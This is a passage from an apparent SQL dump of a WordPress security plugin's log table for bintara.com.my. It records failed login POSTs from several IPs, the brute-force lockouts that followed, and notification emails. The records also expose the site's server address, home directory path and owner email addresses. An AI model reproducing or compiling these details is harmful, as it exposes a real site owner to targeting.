empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY9P0nlR@6WyRVzpiDpogAAAAk\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"18.223.209.52\";s:11:\"REMOTE_PORT\";s:5:\"37226\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY9P0nlR@6WyRVzpiDpogAAAAk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569078591.3611\";s:12:\"REQUEST_TIME\";s:10:\"1569078591\";}}','notice','2019-09-21 15:09:52','2019-09-21 15:09:51',19200496,20690160,'https://bintara.com.my/blog/wp-login.php',1,0,'18.223.209.52'),(26526,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:09:51\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:09:51\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:09:51\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:09:51\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:09:52','2019-09-21 15:09:51',19285096,20690160,'https://bintara.com.my/blog/wp-login.php',1,0,'18.223.209.52'),(26527,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:09:52','2019-09-21 15:09:51',19493048,20690160,'https://bintara.com.my/blog/wp-login.php',1,0,'18.223.209.52'),(26528,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY9VknlR@6WyRVzpiDptgAAAAc\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"192.99.47.10\";s:11:\"REMOTE_PORT\";s:5:\"57674\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY9VknlR@6WyRVzpiDptgAAAAc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569078614.8677\";s:12:\"REQUEST_TIME\";s:10:\"1569078614\";}}','notice','2019-09-21 15:10:16','2019-09-21 15:10:15',19197872,20687872,'https://bintara.com.my/blog/wp-login.php',1,0,'192.99.47.10'),(26529,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:10:15\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:10:15\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:10:15\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:10:15\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:10:16','2019-09-21 15:10:15',19283000,20687872,'https://bintara.com.my/blog/wp-login.php',1,0,'192.99.47.10'),(26530,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:10:16','2019-09-21 15:10:15',19490968,20687872,'https://bintara.com.my/blog/wp-login.php',1,0,'192.99.47.10'),(26531,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY9WEnlR@6WyRVzpiDptwAAAAg\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"142.93.113.182\";s:11:\"REMOTE_PORT\";s:5:\"60566\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY9WEnlR@6WyRVzpiDptwAAAAg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569078616.5213\";s:12:\"REQUEST_TIME\";s:10:\"1569078616\";}}','notice','2019-09-21 15:10:18','2019-09-21 15:10:16',19196824,20685472,'https://bintara.com.my/wp/wp-login.php',1,0,'142.93.113.182'),(26532,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:10:16\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:10:16\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:10:16\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:10:16\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:10:18','2019-09-21 15:10:16',19281672,20685472,'https://bintara.com.my/wp/wp-login.php',1,0,'142.93.113.182'),(26533,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:10:18','2019-09-21 15:10:16',19489264,20685472,'https://bintara.com.my/wp/wp-login.php',1,0,'142.93.113.182'),(26534,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY9cEnlR@6WyRVzpiDpzgAAABc\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"178.128.215.150\";s:11:\"REMOTE_PORT\";s:5:\"60932\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY9cEnlR@6WyRVzpiDpzgAAABc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569078640.3321\";s:12:\"REQUEST_TIME\";s:10:\"1569078640\";}}','notice','2019-09-21 15:10:42','2019-09-21 15:10:40',19231152,20719096,'https://bintara.com.my/wordpress/wp-login.php',1,0,'178.128.215.150'),(26535,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:10:40\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:10:40\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:10:40\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:10:40\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:10:42','2019-09-21 15:10:40',19315936,20719096,'https://bintara.com.my/wordpress/wp-login.php',1,0,'178.128.215.150'),(26536,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:10:42','2019-09-21 15:10:40',19523104,20719096,'https://bintara.com.my/wordpress/wp-login.php',1,0,'178.128.215.150'),(26537,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY9oknlR@6WyRVzpiDp8AAAAAc\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"35.200.239.78\";s:11:\"REMOTE_PORT\";s:5:\"40790\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY9oknlR@6WyRVzpiDp8AAAAAc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569078690.481\";s:12:\"REQUEST_TIME\";s:10:\"1569078690\";}}','notice','2019-09-21 15:11:31','2019-09-21 15:11:30',19230368,20718864,'https://bintara.com.my/2019/wp-login.php',1,0,'35.200.239.78'),(26538,0,'lockout','host-lockout::35.200.239.78','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"35.200.239.78\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:11:30\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:11:30\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:11:30\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:11:30\";s:12:\"lockout_host\";s:13:\"35.200.239.78\";}','action','2019-09-21 15:11:31','2019-09-21 15:11:30',19316312,20718864,'https://bintara.com.my/2019/wp-login.php',1,0,'35.200.239.78'),(26539,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"35.200.239.78\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:11:30\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:11:30\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:11:30\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:11:30\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:11:31','2019-09-21 15:11:30',19316344,20718864,'https://bintara.com.my/2019/wp-login.php',1,0,'35.200.239.78'),(26540,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:11:32','2019-09-21 15:11:30',19524576,20718864,'https://bintara.com.my/2019/wp-login.php',1,0,'35.200.239.78'),(26541,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY9uEnlR@6WyRVzpiDqAQAAABM\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"62.213.11.241\";s:11:\"REMOTE_PORT\";s:5:\"49622\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s: